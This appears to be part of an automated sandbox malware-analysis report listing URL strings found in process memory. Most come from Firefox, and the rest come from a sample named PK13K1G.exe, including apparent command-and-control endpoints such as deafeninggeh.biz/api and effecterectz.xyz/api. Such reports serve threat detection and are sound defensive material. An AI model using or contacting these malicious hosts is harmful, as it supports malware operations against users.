Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631765675.000001324CA70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000017.00000002.2620149903.00000132489AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3105754755.000000000BCB1000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3074070661.0000000001415000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: firefox.exe, 00000017.00000002.2620149903.00000132489AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3105754755.000000000BCB1000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3074070661.0000000001415000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000017.00000002.2704916068.0000013255069000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000017.00000002.2657935720.000001324EE0A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000017.00000002.2614640392.000001323D111000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2614640392.000001323D130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/
Source: PK13K1G.exe, 00000008.00000003.2500719832.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2560501874.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/api
Source: PK13K1G.exe, 00000008.00000003.2500719832.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/api2
Source: PK13K1G.exe, 00000008.00000002.2560501874.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/apiR
Source: PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz:443/api
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureWebExtensionUncheckedLastErr
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsjar
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000017.00000003.2520073438.000001324CD5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631765675.000001324CA70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2653502406.000001324DE9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2711592671.00002F230A104000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2711707343.0000362435C04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3160178575.0000028710AFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2848041071.0000028710AFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000017.00000002.2631765675.000001324CA70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2628867564.000001324B254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626803778.000001324A61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2521738346.000001324A633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol
Source: firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ebay.comP
Source: PK13K1G.exe, 00000008.00000003.2500719832.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/
Source: PK13K1G.exe, 00000008.00000003.2500719832.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api
Source: PK13K1G.exe, 00000008.00000003.2500719832.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api$
Source: PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api(
Source: PK13K1G.exe, 00000008.00000003.2500719832.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/apiM
Source: PK13K1G.exe, 00000008.00000003.2500389249.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/z
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2628867564.000001324B254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626803778.000001324A61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2521738346.000001324A633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sFailed
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/SelectOptionsLengthAssignmentW
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000017.00000002.2628128990.000001324A9F0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000017.00000002.2622599068.0000013249326000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2889553048.000002871223B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1_onDisplaySyncURIs/allKnownSender
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620813706.0000013248AF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2709501209.00000A4652E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000017.00000002.2708011983.00000132567F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2689955530.0000013250753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B62F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
